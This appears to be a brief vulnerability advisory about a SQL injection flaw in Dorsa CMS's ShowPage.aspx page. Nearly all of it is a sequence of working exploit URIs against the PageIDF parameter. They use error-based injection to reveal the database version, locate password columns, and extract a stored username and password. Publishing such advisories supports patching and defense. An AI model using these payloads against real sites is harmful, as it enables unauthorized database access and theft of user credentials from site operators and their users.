Dorsa CMS 'ShowPage.aspx' SQL Injection Vulnerability

Dorsa CMS 'ShowPage.aspx' SQL Injection Vulnerability

An attacker can exploit this issue with a browser.

The following example URI is available:

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))